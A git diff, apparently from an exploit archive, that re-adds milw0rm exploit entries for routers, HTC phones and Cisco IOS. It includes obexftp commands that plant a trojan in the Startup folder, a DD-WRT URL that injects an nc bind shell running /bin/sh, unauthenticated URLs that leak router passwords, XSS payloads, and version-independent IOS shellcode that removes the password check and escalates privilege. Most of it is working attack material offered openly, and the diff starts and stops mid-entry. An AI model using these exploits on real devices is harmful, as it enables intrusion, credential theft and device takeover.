vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable. - -Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. - -HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw. - -Workaround: -This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable. - -Wait for proper vendor response and updates. - -Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list. - -Alberto - -# milw0rm.com [2009-07-10] +I shall complete the information related to Bugtraq ID: 33359 + +Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal +Author: Alberto Moreno Tablado +Vendor: HTC +Vulnerable Products: +- HTC devices running Windows Mobile 6 +- HTC devices running Windows Mobile 6.1 +Non vulnerable products: +- HTC devices running Windows Mobile 5.0 +- Other vendors’ Windows Mobile devices +References: http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html + +Summary: +HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder. + +Description: +There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically. + +A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. + +The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user. + +The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder. + +A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device: + +1) Browse directories located out of the limits of the default shared folder + +An attacker can discover the structure of the file system and access to any directory within it, including: +- The flash hard drive +- The external storage card +- The internal mass storage memory, included in specific HTC devices + +2) Download files without permission + +An attacker can download sensitive files located anywhere in the file system, such as: +- personal pictures and documents located in \My Documents or any other directory +- Contacts, Calendar & Tasks information located in \PIM.vol +- Temporary internet cache and cookies located in \Windows\Profiles\guest\ +- emails located in \Windows\Messaging + +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging" +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done + + + + + + + + +done +Disconnecting...done +gospel@gospel-shift:~/bluez$ + +3) Upload malicious files + +An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits. + +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done +Sending "trojan.exe"...\done +Disconnecting...done +gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup" +Browsing 00:17:83:02:BA:3C ... +Channel: 4 +Connecting...done +Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done + + + + + + + +done +Disconnecting...done +gospel@gospel-shift:~/bluez$ + +About affected and non affected products: +The following HTC devices are affected by this vulnerability: +- HTC devices running Windows Mobile 6 Professional +- HTC devices running Windows Mobile 6 Standard +- HTC devices running Windows Mobile 6.1 Professional +- HTC devices running Windows Mobile 6.1 Standard + +You can find a list of tested HTC devices proved to be vulnerable at http://www.seguridadmobile.com/windows-mobile/windows-mobile-security/HTC-Windows-Mobile-OBEX-FTP-Service-Directory-Traversal.html#AffectedProducts + +HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version. + +Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ... + +Vendor Status: +The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable. + +Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected. + +HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw. + +Workaround: +This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable. + +Wait for proper vendor response and updates. + +Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list. + +Alberto + +# milw0rm.com [2009-07-10] diff --git a/platforms/hardware/remote/9209.txt b/platforms/hardware/remote/9209.txt index 70e8275a9..e385bb23a 100755 --- a/platforms/hardware/remote/9209.txt +++ b/platforms/hardware/remote/9209.txt @@ -1,103 +1,103 @@ -This is a remote root vulnerability in DD-WRT's httpd server. The bug exists -at the latest 24 sp1 version of the firmware. - - The problem is due to many bugs and bad software design decisions. Here is -part of httpd.c: - -859 if (containsstring(file, "cgi-bin")) { -860 -861 auth_fail = 0; -862 if (!do_auth -863 (conn_fp, auth_userid, auth_passwd, auth_realm, -864 authorization, auth_check)) -865 auth_fail = 1; - - -......... (snip)............ - -899 -900 } -901 exec = fopen("/tmp/exec.tmp", "wb"); -902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method); -903 if (query) -904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp"); - -........... (snip).......... - -926 if (auth_fail == 1) { -927 send_authenticate(auth_realm); -928 auth_fail = 0; - ------------- - -3) issue 3: httpd runs as root :) - - - -Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can -connect to the management web interface can get easily root on the device via -his browser with an URL like: - - http://routerIP/cgi-bin/;command_to_execute - -There is a catch though: whitespaces break it. Anyway, they can be easily -replaced with shell variable like $IFS. So, getting root shell at 5555/tcp -becomes as easy as typing this in your browser's url bar: - -http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh - - -Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the -problem: -http://www.youtube.com/watch?v=UhDcXCVFrvM - - -Fortunately, httpd by default does not listen on the outbound interface. -However, this vulnerability can be exploited via a CSRF attack (the dd-wrt -device's owner does not even need to have an authenticated session on the web -UI which is bad, bad). However, a base authentication dialog will appear. In -IE even this can be supressed, see this one: - -http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/ - -Unlike the already documented CSRF vulnerability ( -http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated -session. This means someone can even post some crafted [img] link on a forum -and a dd-wrt router owner visiting the forum will get owned :) - - -A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I -would say :) - - -Thanks krassyo at krassyo.info for his support :) - - -Leka vecher :) - -# milw0rm.com [2009-07-20] +This is a remote root vulnerability in DD-WRT's httpd server. The bug exists +at the latest 24 sp1 version of the firmware. + + The problem is due to many bugs and bad software design decisions. Here is +part of httpd.c: + +859 if (containsstring(file, "cgi-bin")) { +860 +861 auth_fail = 0; +862 if (!do_auth +863 (conn_fp, auth_userid, auth_passwd, auth_realm, +864 authorization, auth_check)) +865 auth_fail = 1; + + +......... (snip)............ + +899 +900 } +901 exec = fopen("/tmp/exec.tmp", "wb"); +902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method); +903 if (query) +904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp"); + +........... (snip).......... + +926 if (auth_fail == 1) { +927 send_authenticate(auth_realm); +928 auth_fail = 0; + +------------ + +3) issue 3: httpd runs as root :) + + + +Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can +connect to the management web interface can get easily root on the device via +his browser with an URL like: + + http://routerIP/cgi-bin/;command_to_execute + +There is a catch though: whitespaces break it. Anyway, they can be easily +replaced with shell variable like $IFS. So, getting root shell at 5555/tcp +becomes as easy as typing this in your browser's url bar: + +http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh + + +Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the +problem: +http://www.youtube.com/watch?v=UhDcXCVFrvM + + +Fortunately, httpd by default does not listen on the outbound interface. +However, this vulnerability can be exploited via a CSRF attack (the dd-wrt +device's owner does not even need to have an authenticated session on the web +UI which is bad, bad). However, a base authentication dialog will appear. In +IE even this can be supressed, see this one: + +http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/ + +Unlike the already documented CSRF vulnerability ( +http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated +session. This means someone can even post some crafted [img] link on a forum +and a dd-wrt router owner visiting the forum will get owned :) + + +A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I +would say :) + + +Thanks krassyo at krassyo.info for his support :) + + +Leka vecher :) + +# milw0rm.com [2009-07-20] diff --git a/platforms/hardware/remote/9432.txt b/platforms/hardware/remote/9432.txt index a6ea4df4b..298029624 100755 --- a/platforms/hardware/remote/9432.txt +++ b/platforms/hardware/remote/9432.txt @@ -1,22 +1,22 @@ -====================================> -System Information - - -Product Name: ST585 -Serial Number: CP0734JTMTR -Software Release: 6.2.29.2 -Software Variant: AA -Boot Loader Version: 1.0.8 -Product Code: 36029470 -Board Name: BANT-W - - ---#[ exploit ]#--- - - [#] - http://192.168.1.254./cgi/b/backup/user.ini - - - ######################## - # Viva Kingdom Of Saudi Arabia # - ####################### - -# milw0rm.com [2009-08-13] +====================================> +System Information + + +Product Name: ST585 +Serial Number: CP0734JTMTR +Software Release: 6.2.29.2 +Software Variant: AA +Boot Loader Version: 1.0.8 +Product Code: 36029470 +Board Name: BANT-W + + ---#[ exploit ]#--- + + [#] - http://192.168.1.254./cgi/b/backup/user.ini + + + ######################## + # Viva Kingdom Of Saudi Arabia # + ####################### + +# milw0rm.com [2009-08-13] diff --git a/platforms/hardware/remote/9456.txt b/platforms/hardware/remote/9456.txt index e103a36ab..a282cc8c7 100755 --- a/platforms/hardware/remote/9456.txt +++ b/platforms/hardware/remote/9456.txt @@ -1,31 +1,31 @@ ------------------------------------------------------ - -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- - --> Made in "Maghnia City" (DZ) <-- - --> Contact : sunhouse2@yahoo.com <-- - --> Greetz to : His0k4 all my friends <-- - --> Good Ramadan to all muslims <-- ------------------------------------------------------ - -Exploit tested on modem with this informations : - -ZTE CORPORATION - -Date : NOV 2008 -Product : ADSL Modem -Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG -Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV - ------------------------------------------------------ -Introduction: - -This modem is used by many providers in the world like -russia india and algeria [used by provider and all clients of "Easy ADSL"]. - -Exploit : -We can change easily the user and password admin and get full access to the modem. - -Go only here and set new user and password: - -http://192.168.1.1/adminpasswd.cgi - -# milw0rm.com [2009-08-18] +----------------------------------------------------- + -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- + --> Made in "Maghnia City" (DZ) <-- + --> Contact : sunhouse2@yahoo.com <-- + --> Greetz to : His0k4 all my friends <-- + --> Good Ramadan to all muslims <-- +----------------------------------------------------- + +Exploit tested on modem with this informations : + +ZTE CORPORATION + +Date : NOV 2008 +Product : ADSL Modem +Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG +Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV + +----------------------------------------------------- +Introduction: + +This modem is used by many providers in the world like +russia india and algeria [used by provider and all clients of "Easy ADSL"]. + +Exploit : +We can change easily the user and password admin and get full access to the modem. + +Go only here and set new user and password: + +http://192.168.1.1/adminpasswd.cgi + +# milw0rm.com [2009-08-18] diff --git a/platforms/hardware/remote/9473.txt b/platforms/hardware/remote/9473.txt index 2634fdf41..f6290fb13 100755 --- a/platforms/hardware/remote/9473.txt +++ b/platforms/hardware/remote/9473.txt @@ -1,39 +1,39 @@ ------------------------------------------------------ - -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- - --> Made in "Maghnia City" (DZ) <-- - --> Contact : sunhouse2@yahoo.com <-- - --> Greetz to : His0k4 all my friends <-- - --> Good Ramadan to all muslims <-- ------------------------------------------------------ - -Exploit tested on modem with this informations : - -ZTE CORPORATION - -Date : NOV 2008 -Product : ADSL Modem -Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG -Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV - ------------------------------------------------------ -Introduction: - -This modem is used by many providers in the world like -russia india and algeria [used by provider and all clients of "Easy ADSL"]. - -Exploit : -We can get access to to configuration of the modem , and get PPPOE user & password. - -Go only here -http://192.168.1.1/vpivci.cgi - -A video uploaded to explain how we can use this exploit to get PPPOE sessions -with user & password - -download video demonstration > - -http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar - ------------------------------------------------------- - -# milw0rm.com [2009-08-18] +----------------------------------------------------- + -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] <<-- + --> Made in "Maghnia City" (DZ) <-- + --> Contact : sunhouse2@yahoo.com <-- + --> Greetz to : His0k4 all my friends <-- + --> Good Ramadan to all muslims <-- +----------------------------------------------------- + +Exploit tested on modem with this informations : + +ZTE CORPORATION + +Date : NOV 2008 +Product : ADSL Modem +Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG +Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV + +----------------------------------------------------- +Introduction: + +This modem is used by many providers in the world like +russia india and algeria [used by provider and all clients of "Easy ADSL"]. + +Exploit : +We can get access to to configuration of the modem , and get PPPOE user & password. + +Go only here +http://192.168.1.1/vpivci.cgi + +A video uploaded to explain how we can use this exploit to get PPPOE sessions +with user & password + +download video demonstration > + +http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar + +------------------------------------------------------ + +# milw0rm.com [2009-08-18] diff --git a/platforms/hardware/remote/9498.txt b/platforms/hardware/remote/9498.txt index a845d8ec8..52fe13f11 100755 --- a/platforms/hardware/remote/9498.txt +++ b/platforms/hardware/remote/9498.txt @@ -1,26 +1,26 @@ -Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless -routa' runnin' firmware 1.2.0.8. - -1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply -request widout audenticashun: - -http://netgear/router-info.htm -http://netgear/cgi-bin/router-info.htm - -De routa' gots'ta respond wid: - -DeviceID:WNR2000; -HardwareVersion:; -FirmwareVersion:V1.2.0.8NA; -WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf - -2. Unaudenticated disclosho' man uh administrato' passwo'd Simply -request widout audenticashun: - -http://netgear/cgi-bin/NETGEAR_WNR2000.cfg - -Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. -WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme -be left as an 'esercise t'de eyeballer. Ah be baaad... - -# milw0rm.com [2009-08-24] +Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless +routa' runnin' firmware 1.2.0.8. + +1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply +request widout audenticashun: + +http://netgear/router-info.htm +http://netgear/cgi-bin/router-info.htm + +De routa' gots'ta respond wid: + +DeviceID:WNR2000; +HardwareVersion:; +FirmwareVersion:V1.2.0.8NA; +WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf + +2. Unaudenticated disclosho' man uh administrato' passwo'd Simply +request widout audenticashun: + +http://netgear/cgi-bin/NETGEAR_WNR2000.cfg + +Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem. +WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme +be left as an 'esercise t'de eyeballer. Ah be baaad... + +# milw0rm.com [2009-08-24] diff --git a/platforms/hardware/remote/9658.txt b/platforms/hardware/remote/9658.txt index cb7b32807..1a87d470e 100755 --- a/platforms/hardware/remote/9658.txt +++ b/platforms/hardware/remote/9658.txt @@ -1,28 +1,28 @@ -_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ -_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ -_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ -_____0______0______0__0______0___0__0________0___0__00000__0___0_ -_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ -_________________________________________________________________ - - - -# [+] Neufbox NB4-R1.5.10-MAIN Persistent XSS -# [+] Author : 599eme Man -# [+] Contact : Flouf@live.fr -# [+] Thanks : Moudi, Kim, Neocoderz, Syltrox66, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... -# -#[------------------------------------------------------------------------------------] -# -# [+] Vulnerability -# -# [+] Persistent XSS -# -# - http://[IPLocal]/3_1 => SSID = 1> -# Valid and go here to execute the XSS : http://[IPLocal]/3_0 -# -#[------------------------------------------------------------------------------------] -# -######################################################################################################### - -# milw0rm.com [2009-09-14] +_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_ +_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_ +_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_ +_____0______0______0__0______0___0__0________0___0__00000__0___0_ +_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_ +_________________________________________________________________ + + + +# [+] Neufbox NB4-R1.5.10-MAIN Persistent XSS +# [+] Author : 599eme Man +# [+] Contact : Flouf@live.fr +# [+] Thanks : Moudi, Kim, Neocoderz, Syltrox66, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell... +# +#[------------------------------------------------------------------------------------] +# +# [+] Vulnerability +# +# [+] Persistent XSS +# +# - http://[IPLocal]/3_1 => SSID = 1> +# Valid and go here to execute the XSS : http://[IPLocal]/3_0 +# +#[------------------------------------------------------------------------------------] +# +######################################################################################################### + +# milw0rm.com [2009-09-14] diff --git a/platforms/hardware/shellcode/13290.txt b/platforms/hardware/shellcode/13290.txt index 193290db1..3511afa98 100755 --- a/platforms/hardware/shellcode/13290.txt +++ b/platforms/hardware/shellcode/13290.txt @@ -1,83 +1,83 @@ -# Version-independent IOS shellcode, Andy Davis 2008 -# -# No hard-coded IOS addresses required -# -# The technique uses 4-byte signatures near references to the -# required addresses within the IOS "text" memory region. -# The addresses are then recovered from memory and used within the -# shellcode. -# -# This is beta 1 - this code can be highly optimised I'm sure, -# for example, the search routine could be reused and the number -# of registers cleared could be reduced - but it works :-) -# -# As this is the first iteration of this shellcode, I'm not making any -# claims as to exactly how portable it is - it has been tested on a -# number of IOS images and therefore, the concept has been demonstrated. -# -# Various simple techniques have been used to ensure that there are -# no nulls in the shellcode - - -.equ sig_vty, 0x7F60B910 # signature for vty_info -.equ sig_kill, 0x639C8889 # signature for terminate() -.equ start, 0x80018001 # start of the search - - -3c 80 80 02 lis r4,-32766 -38 84 80 01 addi r4,r4,-32767 # the start address for the search -3c a0 63 9d lis r5,25501 -38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature -38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls -(technique used throughout the shellcode) -38 e7 fe 70 addi r7,r7,-400 -7c c4 38 6e l1: lwzux r6,r4,r7 -7c 06 28 40 cmplw r6,r5 # is address contents equal to signature -40 82 ff f8 bne 18 # no, keep searching -7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill" -38 84 01 e8 addi r4,r4,488 -38 84 fe 70 addi r4,r4,-400 -7c c4 28 2e lwzx r6,r4,r5 -38 a5 01 98 addi r5,r5,408 -38 a5 fe 70 addi r5,r5,-400 -7c c6 28 30 slw r6,r6,r5 -7c c6 2c 30 srw r6,r6,r5 -38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of -terminate() from here -7c 84 32 14 add r4,r4,r6 # add offset to current address -7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10 -7c e7 3a 78 xor r7,r7,r7 -3c a0 7f 61 lis r5,32609 -38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature -38 e7 01 94 addi r7,r7,404 -38 e7 fe 70 addi r7,r7,-400 -7c c4 38 6e l2: lwzux r6,r4,r7 -7c 06 28 40 cmplw r6,r5 # is address contents equal to signature -40 82 ff f8 bne 64 # no, keep searching -38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty" -38 84 fe 70 addi r4,r4,-400 -7c e7 3a 78 xor r7,r7,r7 -7c a4 38 2e lwzx r5,r4,r7 # get two MSBs -38 a5 ff ff addi r5,r5,-1 -7d 08 42 78 xor r8,r8,r8 -39 08 01 a0 addi r8,r8,416 -39 08 fe 70 addi r8,r8,-400 -7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000) -38 84 01 94 addi r4,r4,404 -38 84 fe 70 addi r4,r4,-400 -7c c4 38 2e lwzx r6,r4,r7 # get two LSBs -7c c6 40 30 slw r6,r6,r8 -7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY) -7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY) -38 a5 01 08 addi r5,r5,264 # move to the 66th element of the -array (VTY 0 - see IOS "systat" command) -7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info -90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password -38 e7 ff ff addi r7,r7,-1 -39 08 09 1a addi r8,r8,2330 -90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15 -7c e3 3b 78 mr r3,r7 -7d 49 03 a6 mtctr r10 -4e 80 04 20 bctr # terminate "this process" - +# Version-independent IOS shellcode, Andy Davis 2008 +# +# No hard-coded IOS addresses required +# +# The technique uses 4-byte signatures near references to the +# required addresses within the IOS "text" memory region. +# The addresses are then recovered from memory and used within the +# shellcode. +# +# This is beta 1 - this code can be highly optimised I'm sure, +# for example, the search routine could be reused and the number +# of registers cleared could be reduced - but it works :-) +# +# As this is the first iteration of this shellcode, I'm not making any +# claims as to exactly how portable it is - it has been tested on a +# number of IOS images and therefore, the concept has been demonstrated. +# +# Various simple techniques have been used to ensure that there are +# no nulls in the shellcode + + +.equ sig_vty, 0x7F60B910 # signature for vty_info +.equ sig_kill, 0x639C8889 # signature for terminate() +.equ start, 0x80018001 # start of the search + + +3c 80 80 02 lis r4,-32766 +38 84 80 01 addi r4,r4,-32767 # the start address for the search +3c a0 63 9d lis r5,25501 +38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature +38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls +(technique used throughout the shellcode) +38 e7 fe 70 addi r7,r7,-400 +7c c4 38 6e l1: lwzux r6,r4,r7 +7c 06 28 40 cmplw r6,r5 # is address contents equal to signature +40 82 ff f8 bne 18 # no, keep searching +7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill" +38 84 01 e8 addi r4,r4,488 +38 84 fe 70 addi r4,r4,-400 +7c c4 28 2e lwzx r6,r4,r5 +38 a5 01 98 addi r5,r5,408 +38 a5 fe 70 addi r5,r5,-400 +7c c6 28 30 slw r6,r6,r5 +7c c6 2c 30 srw r6,r6,r5 +38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of +terminate() from here +7c 84 32 14 add r4,r4,r6 # add offset to current address +7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10 +7c e7 3a 78 xor r7,r7,r7 +3c a0 7f 61 lis r5,32609 +38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature +38 e7 01 94 addi r7,r7,404 +38 e7 fe 70 addi r7,r7,-400 +7c c4 38 6e l2: lwzux r6,r4,r7 +7c 06 28 40 cmplw r6,r5 # is address contents equal to signature +40 82 ff f8 bne 64 # no, keep searching +38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty" +38 84 fe 70 addi r4,r4,-400 +7c e7 3a 78 xor r7,r7,r7 +7c a4 38 2e lwzx r5,r4,r7 # get two MSBs +38 a5 ff ff addi r5,r5,-1 +7d 08 42 78 xor r8,r8,r8 +39 08 01 a0 addi r8,r8,416 +39 08 fe 70 addi r8,r8,-400 +7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000) +38 84 01 94 addi r4,r4,404 +38 84 fe 70 addi r4,r4,-400 +7c c4 38 2e lwzx r6,r4,r7 # get two LSBs +7c c6 40 30 slw r6,r6,r8 +7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY) +7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY) +38 a5 01 08 addi r5,r5,264 # move to the 66th element of the +array (VTY 0 - see IOS "systat" command) +7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info +90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password +38 e7 ff ff addi r7,r7,-1 +39 08 09 1a addi r8,r8,2330 +90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15 +7c e3 3b 78 mr r3,r7 +7d 49 03 a6 mtctr r10 +4e 80 04 20 bctr # terminate "this process" + # milw0rm.com [2008-08-21] \ No newline at end of file diff --git a/platforms/hardware/webapps/10276.txt b/platforms/hardware/webapps/10276.txt index d34bdf575..a1568e376 100755 --- a/platforms/hardware/webapps/10276.txt +++ b/platforms/hardware/webapps/10276.txt @@ -115,9 +115,9 @@ The POST variable BackButton has been set to >">alert(416215520 /Forms/error_1 Details -The POST variable BackButton has been set to alert(416225520282)%3B . +The POST variable BackButton has been set to </textarea>alert(416225520282)%3B . -BackButton=alert(416225520282)%3B +BackButton=</textarea>alert(416225520282)%3B ################################################################################################################################## @@ -199,9 +199,9 @@ wzConnFlag=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28401565272624%29%3B%22% /Forms/fresh_pppoe_1 Details -The POST variable wzConnFlag has been set to alert(401515272624)%3B . +The POST variable wzConnFlag has been set to </textarea>alert(401515272624)%3B . -wzConnFlag=alert(401515272624)%3B +wzConnFlag=</textarea>alert(401515272624)%3B ################################################################################################################################## @@ -274,9 +274,9 @@ diag_pppindex_argen=email@somealert(407145360657)%3Bdo /Forms/rpDiag_argen_1 Details -The POST variable diag_pppindex_argen has been set to alert(407115360657)%3B . +The POST variable diag_pppindex_argen has been set to </textarea>alert(407115360657)%3B . -diag_pppindex_argen=alert(407115360657)%3B&DiagArgenTest=Test&DiagStartFlag=0 +diag_pppindex_argen=</textarea>alert(407115360657)%3B&DiagArgenTest=Test&DiagStartFlag=0 ################################################################################################################################## @@ -369,9 +369,9 @@ diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag= . +The POST variable DiagStartFlag has been set to </textarea>alert(407215360661)%3B . -diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=aler +diag_pppindex_argen=0&DiagArgenTest=Test&DiagStartFlag=</textarea>aler ################################################################################################################################## @@ -401,9 +401,9 @@ wzdmz_active=alert(414945497855)%3B&wzdmzHostI /Forms/rpNATdmz_argen_1 Details -The POST variable wzdmz_active has been set to alert(414935497855)%3B . +The POST variable wzdmz_active has been set to </textarea>alert(414935497855)%3B . -wzdmz_active=alert(414935497855)%3B&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar +wzdmz_active=</textarea>alert(414935497855)%3B&wzdmzHostIP=0%2E0%2E0%2E0&NATDMZApply=Aceptar ################################################################################################################################## @@ -473,9 +473,9 @@ wzdmz_active=>'>alert(414915497855)%3B&wzdmzHostIP=0%2 /Forms/rpNATdmz_argen_1 Details -The POST variable wzdmzHostIP has been set to alert(415035497857)%3B . +The POST variable wzdmzHostIP has been set to </textarea>alert(415035497857)%3B . -wzdmz_active=1&wzdmzHostIP=alert(415035497857)%3B&NATDMZApply=Aceptar +wzdmz_active=1&wzdmzHostIP=</textarea>alert(415035497857)%3B&NATDMZApply=Aceptar ################################################################################################################################## @@ -553,9 +553,9 @@ wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzV /Forms/rpNATvirsvr_argen_1 Details -The POST variable wzVIRTUALSVR_endPort has been set to alert(409405385265)%3B . +The POST variable wzVIRTUALSVR_endPort has been set to </textarea>alert(409405385265)%3B . -wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=alert(409405385265)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar +wzVIRTUALSVR_IndexFlag=0&wzVIRTUALSVR_Application=-&wzVIRTUALSVR_startPort=0&wzVIRTUALSVR_endPort=</textarea>alert(409405385265)%3B&wzVIRTUALSVR_localIP=0%2E0%2E0%2E0&wzVIRTUALSVR_startPortLocal=0&wzVIRTUALSVR_endPortLocal=0&NATDMZApply=Aceptar&NATVirsvrDelete=Borrar ################################################################################################################################## @@ 